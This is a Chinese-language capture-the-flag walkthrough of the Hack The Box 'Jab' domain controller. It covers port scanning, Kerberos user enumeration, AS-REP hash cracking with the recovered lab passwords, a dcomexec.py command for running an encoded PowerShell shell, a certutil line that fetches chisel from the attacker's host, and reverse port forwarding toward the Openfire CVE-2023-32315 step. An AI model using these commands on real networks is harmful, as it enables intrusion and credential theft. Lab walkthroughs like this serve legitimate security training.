Hack The Box-Jab


目录

信息收集

nmap

enum4linux

服务信息收集

Pidgin

kerbrute

hashcat

反弹shell & get user

提权

系统信息收集

端口转发

漏洞利用

get root


信息收集

nmap
端口探测

┌──(root㉿ru)-[~/kali/hackthebox]
└─# nmap -p- 10.10.11.4 --min-rate 10000 -oA port  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 10:36 CST
Warning: 10.10.11.4 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.4
Host is up (0.35s latency).
Not shown: 62238 closed tcp ports (reset), 3249 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5222/tcp  open  xmpp-client
5223/tcp  open  hpvirtgrp
5262/tcp  open  unknown
5263/tcp  open  unknown
5269/tcp  open  xmpp-server
5270/tcp  open  xmp
5275/tcp  open  unknown
5276/tcp  open  unknown
5985/tcp  open  wsman
7070/tcp  open  realserver
7443/tcp  open  oracleas-https
7777/tcp  open  cbt
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49672/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49676/tcp open  unknown
49681/tcp open  unknown
49774/tcp open  unknown
53269/tcp open  unknown
54462/tcp open  unknown
54469/tcp open  unknown
54472/tcp open  unknown
54481/tcp open  unknown
54486/tcp open  unknown
54503/tcp open  unknown
54512/tcp open  unknown
55122/tcp open  unknown
55128/tcp open  unknown
55129/tcp open  unknown
55145/tcp open  unknown
55440/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 44.24 seconds

┌──(root㉿ru)-[~/kali/hackthebox]
└─# cat port.nmap | head -54 | tail -48 | awk -F "/" '{print($1)}' | xargs -n 48 | sed 's/ /,/g'
53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49672,49674,49675,49676,49681,49774,53269,54462,54469,54472,54481,54486,54503,54512,55122,55128,55129,55145,55440

好家伙,开了一堆端口,我们需要对所有端口进行探测,因为这些端口可能隐藏着重要信息!

服务信息探测

┌──(root㉿ru)-[~/kali/hackthebox]
└─# nmap -sCV -O -A -p 53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49672,49674,49675,49676,49681,49774,53269,54462,54469,54472,54481,54486,54503,54512,55122,55128,55129,55145,55440 10.10.11.4 --min-rate 10000                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 10:47 CST
Nmap scan report for 10.10.11.4
Host is up (0.35s latency).

PORT      STATE SERVICE             VERSION
53/tcp    open  domain              Simple DNS Plus
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-03-16 02:48:10Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp   open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-03-16T02:52:41+00:00; 0s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T02:52:38+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T02:52:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
3269/tcp  open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T02:52:37+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
5222/tcp  open  jabber
| xmpp-info: 
|   Respects server name
|   STARTTLS Failed
|   info: 
|     compression_methods: 
|     xmpp: 
|     errors: 
|       (timeout)
|     auth_mechanisms: 
|     capabilities: 
|     unknown: 
|_    features: 
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5223/tcp  open  ssl/jabber
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     compression_methods: 
|     xmpp: 
|     errors: 
|       (timeout)
|     auth_mechanisms: 
|     capabilities: 
|     unknown: 
|_    features: 
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5262/tcp  open  jabber
|_xmpp-info: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp  open  ssl/jabber
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_xmpp-info: ERROR: Script execution failed (use -d to debug)
5269/tcp  open  xmpp                Wildfire XMPP Client
|_xmpp-info: ERROR: Script execution failed (use -d to debug)
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5275/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     capabilities: 
|     compression_methods: 
|     xmpp: 
|       version: 1.0
|     errors: 
|       invalid-namespace
|       (timeout)
|     auth_mechanisms: 
|     stream_id: 67mece4z7j
|     unknown: 
|_    features: 
5276/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
|_xmpp-info: ERROR: Script execution failed (use -d to debug)
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7070/tcp  open  realserver?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 16 Mar 2024 02:48:09 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sat, 16 Mar 2024 02:48:20 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp  open  ssl/oracleas-https?
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Sat, 16 Mar 2024 02:48:24 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Sat, 16 Mar 2024 02:48:34 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7777/tcp  open  socks5              (No authentication; connection failed)
| socks-auth-info: 
|_  No authentication
9389/tcp  open  adws?
47001/tcp open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  msrpc               Microsoft Windows RPC
49672/tcp open  unknown
49674/tcp open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc               Microsoft Windows RPC
49676/tcp open  msrpc               Microsoft Windows RPC
49681/tcp open  unknown
49774/tcp open  unknown
53269/tcp open  msrpc               Microsoft Windows RPC
54462/tcp open  tcpwrapped
54469/tcp open  unknown
54472/tcp open  msrpc               Microsoft Windows RPC
54481/tcp open  tcpwrapped
54486/tcp open  msrpc               Microsoft Windows RPC
54503/tcp open  msrpc               Microsoft Windows RPC
54512/tcp open  msrpc               Microsoft Windows RPC
55122/tcp open  unknown
55128/tcp open  msrpc               Microsoft Windows RPC
55129/tcp open  msrpc               Microsoft Windows RPC
55145/tcp open  msrpc               Microsoft Windows RPC
55440/tcp open  unknown
6 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5222-TCP:V=7.94SVN%I=7%D=3/16%Time=65F5087F%P=x86_64-pc-linux-gnu%r
SF:(RPCCheck,9B,"<stream:error\x20xmlns:stream=\"http://etherx\.jabber\.or
SF:g/streams\"><not-well-formed\x20xmlns=\"urn:ietf:params:xml:ns:xmpp-str
SF:eams\"/></stream:error></stream:stream>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5223-TCP:V=7.94SVN%T=SSL%I=7%D=3/16%Time=65F508A1%P=x86_64-pc-linux
SF:-gnu%r(RPCCheck,9B,"<stream:error\x20xmlns:stream=\"http://etherx\.jabb
SF:er\.org/streams\"><not-well-formed\x20xmlns=\"urn:ietf:params:xml:ns:xm
SF:pp-streams\"/></stream:error></stream:stream>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5262-TCP:V=7.94SVN%I=7%D=3/16%Time=65F50883%P=x86_64-pc-linux-gnu%r
SF:(RPCCheck,9B,"<stream:error\x20xmlns:stream=\"http://etherx\.jabber\.or
SF:g/streams\"><not-well-formed\x20xmlns=\"urn:ietf:params:xml:ns:xmpp-str
SF:eams\"/></stream:error></stream:stream>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5263-TCP:V=7.94SVN%T=SSL%I=7%D=3/16%Time=65F508A2%P=x86_64-pc-linux
SF:-gnu%r(RPCCheck,9B,"<stream:error\x20xmlns:stream=\"http://etherx\.jabb
SF:er\.org/streams\"><not-well-formed\x20xmlns=\"urn:ietf:params:xml:ns:xm
SF:pp-streams\"/></stream:error></stream:stream>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7070-TCP:V=7.94SVN%I=7%D=3/16%Time=65F5086D%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,189,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2016\x20Mar\x
SF:202024\x2002:48:09\x20GMT\r\nLast-Modified:\x20Wed,\x2016\x20Feb\x20202
SF:2\x2015:55:02\x20GMT\r\nContent-Type:\x20text/html\r\nAccept-Ranges:\x2
SF:0bytes\r\nContent-Length:\x20223\r\n\r\n<html>\n\x20\x20<head><title>Op
SF:enfire\x20HTTP\x20Binding\x20Service</title></head>\n\x20\x20<body><fon
SF:t\x20face=\"Arial,\x20Helvetica\"><b>Openfire\x20<a\x20href=\"http://ww
SF:w\.xmpp\.org/extensions/xep-0124\.html\">HTTP\x20Binding</a>\x20Service
SF:</b></font></body>\n</html>\n")%r(RTSPRequest,AD,"HTTP/1\.1\x20505\x20U
SF:nknown\x20Version\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nC
SF:ontent-Length:\x2058\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\
SF:x20505</h1><pre>reason:\x20Unknown\x20Version</pre>")%r(HTTPOptions,56,
SF:"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2016\x20Mar\x202024\x2002:48:
SF:20\x20GMT\r\nAllow:\x20GET,HEAD,POST,OPTIONS\r\n\r\n")%r(RPCCheck,C7,"H
SF:TTP/1\.1\x20400\x20Illegal\x20character\x20OTEXT=0x80\r\nContent-Type:\
SF:x20text/html;charset=iso-8859-1\r\nContent-Length:\x2071\r\nConnection:
SF:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\
SF:x20character\x20OTEXT=0x80</pre>")%r(DNSVersionBindReqTCP,C3,"HTTP/1\.1
SF:\x20400\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/ht
SF:ml;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\
SF:r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20charact
SF:er\x20CNTL=0x0</pre>")%r(DNSStatusRequestTCP,C3,"HTTP/1\.1\x20400\x20Il
SF:legal\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/html;charset=is
SF:o-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\n\r\n<h1>Ba
SF:d\x20Message\x20400</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x
SF:0</pre>")%r(Help,9B,"HTTP/1\.1\x20400\x20No\x20URI\r\nContent-Type:\x20
SF:text/html;charset=iso-8859-1\r\nContent-Length:\x2049\r\nConnection:\x2
SF:0close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20No\x20URI</
SF:pre>")%r(SSLSessionReq,C5,"HTTP/1\.1\x20400\x20Illegal\x20character\x20
SF:CNTL=0x16\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nContent-L
SF:ength:\x2070\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</
SF:h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x16</pre>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7443-TCP:V=7.94SVN%T=SSL%I=7%D=3/16%Time=65F50878%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,189,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2016\x2
SF:0Mar\x202024\x2002:48:24\x20GMT\r\nLast-Modified:\x20Wed,\x2016\x20Feb\
SF:x202022\x2015:55:02\x20GMT\r\nContent-Type:\x20text/html\r\nAccept-Rang
SF:es:\x20bytes\r\nContent-Length:\x20223\r\n\r\n<html>\n\x20\x20<head><ti
SF:tle>Openfire\x20HTTP\x20Binding\x20Service</title></head>\n\x20\x20<bod
SF:y><font\x20face=\"Arial,\x20Helvetica\"><b>Openfire\x20<a\x20href=\"htt
SF:p://www\.xmpp\.org/extensions/xep-0124\.html\">HTTP\x20Binding</a>\x20S
SF:ervice</b></font></body>\n</html>\n")%r(HTTPOptions,56,"HTTP/1\.1\x2020
SF:0\x20OK\r\nDate:\x20Sat,\x2016\x20Mar\x202024\x2002:48:34\x20GMT\r\nAll
SF:ow:\x20GET,HEAD,POST,OPTIONS\r\n\r\n")%r(RTSPRequest,AD,"HTTP/1\.1\x205
SF:05\x20Unknown\x20Version\r\nContent-Type:\x20text/html;charset=iso-8859
SF:-1\r\nContent-Length:\x2058\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20M
SF:essage\x20505</h1><pre>reason:\x20Unknown\x20Version</pre>")%r(RPCCheck
SF:,C7,"HTTP/1\.1\x20400\x20Illegal\x20character\x20OTEXT=0x80\r\nContent-
SF:Type:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2071\r\nConne
SF:ction:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Il
SF:legal\x20character\x20OTEXT=0x80</pre>")%r(DNSVersionBindReqTCP,C3,"HTT
SF:P/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type:\x20t
SF:ext/html;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20
SF:close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20c
SF:haracter\x20CNTL=0x0</pre>")%r(DNSStatusRequestTCP,C3,"HTTP/1\.1\x20400
SF:\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/html;char
SF:set=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\n\r\n
SF:<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20character\x20C
SF:NTL=0x0</pre>")%r(Help,9B,"HTTP/1\.1\x20400\x20No\x20URI\r\nContent-Typ
SF:e:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2049\r\nConnecti
SF:on:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20No\x2
SF:0URI</pre>")%r(SSLSessionReq,C5,"HTTP/1\.1\x20400\x20Illegal\x20charact
SF:er\x20CNTL=0x16\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nCon
SF:tent-Length:\x2070\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x2
SF:0400</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x16</pre>");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows Server 2016 (91%), Microsoft Windows 10 1709 - 1909 (89%), Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2008 SP2 (89%), Microsoft Windows Vista SP1 (89%), Microsoft Windows XP SP3 (89%), Microsoft Windows 7 SP1 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-03-16T02:51:31
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   338.76 ms 10.10.14.1
2   336.96 ms 10.10.11.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 308.90 seconds


信息很多,请认真分析!

发现端口 88 Kerberos 正在运行,因此我尝试了 PreAuth User Enumeration 并且发现了超过 100 个用户;
还有一个在 7070 和 7443 上运行的 Web 服务器之类的东西。没有什么有趣的;
端口 5222 jabber 也在运行。它是一个XMPP 客户端连接协议。


enum4linux
我发现了该机器开放着139以及445端口,使用 enum4linux 进行整体smb服务探测

报错了!行不通!

服务信息收集

Pidgin
5275/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later

5269/tcp  open  xmpp                Wildfire XMPP Client
|_xmpp-info: ERROR: Script execution failed (use -d to debug)
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client

jabber是一个XMPP 客户端连接协议。

通过搜索,这两个都是聊天服务!

pidgin是一个聊天软件,它支持和5275端口交互!

我们安装一下pidgin!

apt-get install pidgin

我们创建一个账号,域 jab.htb  连接端口5222 ,服务器 10.10.11.4

单击“确定”后,会收到一条响应,说明<用户名>@jab.htb 注册成功。
现在,在您的“帐户”窗口中,有一个用于启用您的帐户的框,单击它后输入您的密码并接受自签名证书。
现在应该有一个名为“好友列表”的窗口打开.


点击左上角的“好友”→加入聊天→然后点击“房间列表”。
将出现 2 个弹出窗口。将会议服务器搜索保留为“conference.jab.htb”,然后就可以自动获取房间了!

将弹出 2 个聊天室。要加入房间,只需选择它并单击“加入”。

“test2”是我唯一可以加入的聊天室,加入后发现没有人在线交谈,也没有任何有用的信息。


kerbrute
我们使用kerbrute进行域内用户数据获取

payload

./kerbrute userenum --dc 10.10.11.4 -d jab.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt 

获取的速度非常慢!!!

最终获取到了很多用户!

这是获取用户的第一种方式!
第二种:利用pidgin加入域可以查询域内用户的特点!我们可以把操作记录通过日志的方式记录下来!

再搜索时填写 * 号即可搜索到所有的用户!
┌──(root㉿ru)-[~/Tools/pidgin]
└─# grep -oP '<value>\K[^<]+@jab.htb(?=</value>)' 2.log | sed 's/@jab.htb//g' | sort | uniq > 3.txt

通过正则表达式,提取日志内的用户名。并且去重排序!!

现在得到了用户,我们使用 impacket内的GetNPUsers.py脚本来进行用户名筛选

┌──(root?ru)-[/usr/share/doc/python3-impacket/examples]
└─# cat pass.txt           
$krb5asrep$23$jmontgomery@JAB.HTB:9546403d0df2ff69436462d1bcc49222$5b82a70a604018a7bf46c58cc50e2f7bb5d018cdece1a762a6969c6687e3dc024de810fa2961cf2f8cc123aba5acd5981b374ab32c142e20c43e2c34a2e6bba2e536ce6e7d3448b44d93a040c576d2e8ec573a4f18bcf4abfcc07e3b0e606c04698531d2f026da90021ed83113d2368ba3bd39b24b85cffa2d33b7000792f5007939975137ff95fa189cf0cf189549c7cc64b273374b0371635d364377e47c137174bcecea341ee4075d5f9f6ba474c1074e53be8037115ea53b8ab7fc103725707811a5daf14ab1fe96fb75ed5adf45ac3862418e94eab9dd68e87fc79e551c61e8


hashcat

使用hashcat破解一下!
┌──(root?ru)-[/usr/share/doc/python3-impacket/examples]
└─# hashcat pass.txt --show 

Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

18200 | Kerberos 5, etype 23, AS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5asrep$23$jmontgomery@JAB.HTB:9546403d0df2ff69436462d1bcc49222$5b82a70a604018a7bf46c58cc50e2f7bb5d018cdece1a762a6969c6687e3dc024de810fa2961cf2f8cc123aba5acd5981b374ab32c142e20c43e2c34a2e6bba2e536ce6e7d3448b44d93a040c576d2e8ec573a4f18bcf4abfcc07e3b0e606c04698531d2f026da90021ed83113d2368ba3bd39b24b85cffa2d33b7000792f5007939975137ff95fa189cf0cf189549c7cc64b273374b0371635d364377e47c137174bcecea341ee4075d5f9f6ba474c1074e53be8037115ea53b8ab7fc103725707811a5daf14ab1fe96fb75ed5adf45ac3862418e94eab9dd68e87fc79e551c61e8:Midnight_121

**用户名:jmontgomery  密码就是:Midnight_121  **

使用这个账号可以加入到一个新的聊天室!

他们给了我们提示

账号:svc_openfire

密码就是:!@#$%^&*(1qazxsw

反弹shell & get user
有了账号密码,我们就需要登录了!

从nmap扫描结果来看,机器开启了msrpc的服务,我们就可以使用 impacket中的 dcomexec.py 脚本进行远程登录windows了
dcomexec.py 是 Impacket 库中的另一个脚本,用于执行 DCOM (Distributed Component Object Model) 相关的操作。
这个脚本通常用于在 Windows 主机上执行远程代码或者执行一些特定的操作,例如获取房间信息、执行命令等。


python dcomexec.py <target hostname/ip> <CLSID> <interface>


- `<target hostname/ip>`: 目标 Windows 主机的主机名或者 IP 地址。
- `<CLSID>`: 目标 COM (Component Object Model) 对象的 Class Identifier (CLSID)。
- `<interface>`: COM 对象的接口。

例如,要连接到目标主机 `192.168.1.10` 上的 `ShellWindows` COM 对象,可以使用以下命令:

python dcomexec.py 192.168.1.10 9BA05972-F6A8-11CF-A442-00A0C90A8F39 00000000-0000-0000-0000-000000000000


payload


dcomexec.py -object MMC20 jab.htb/svc_openfire:'<password>'@10.10.11.4 'cmd.exe /c powershell -e <payload>' -silentcommand

我们构建一个powershell 脚本!

记得编码一下!!


提权

系统信息收集

当我一筹莫展的时候,发现了 openfire-service 这个服务!

搜索发现存在 CVE-2023-32315 漏洞!!

Exploitation of Openfire CVE-2023-32315 - Blog - VulnCheckCVE-2023-32315 was first exploited in the wild in June 2023. However, VulnCheck has discovered an new approach to exploiting this vulnerability, streamlining the attack process and adeptly bypassing the generation of log entries. In addition, VulnCheck analyzes the remaining indicators of compromise and shares network detections.icon-default.png?t=N7T8https://vulncheck.com/blog/openfire-cve-2023-32315

应该是机器的eopenfire服务器过于老旧,没有升级换代,所有存在 openfire目录遍历漏洞!
默认的登陆端口是 9090 、 9091  

经过查看发现还真是!

但是我发现我没办法直接访问服务!我需要上传一个端口转发工具!

使用Chisel或者ew都可以!Chisel比ew稳定一点!!

端口转发
certutil.exe -urlcache -f http://10.10.14.10:7890/chisel.exe chisel.exe

certutil.exe  windows自带的!用这条命令把本地的内网穿透工具上传到windows!!
windwos

./chisel.exe client 10.10.14.10:8050 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091



kali

./chisel server -p 8050 --reverse

ok了!这样我们就可以直接使用本地回环地址访问内网服务了!

漏洞利用

成功了!版本是4.7.5的!!

我们直接使用svc_openfire用户进行登录

账号:svc_openfire   密码:!@#$%^&*(1qazxsw

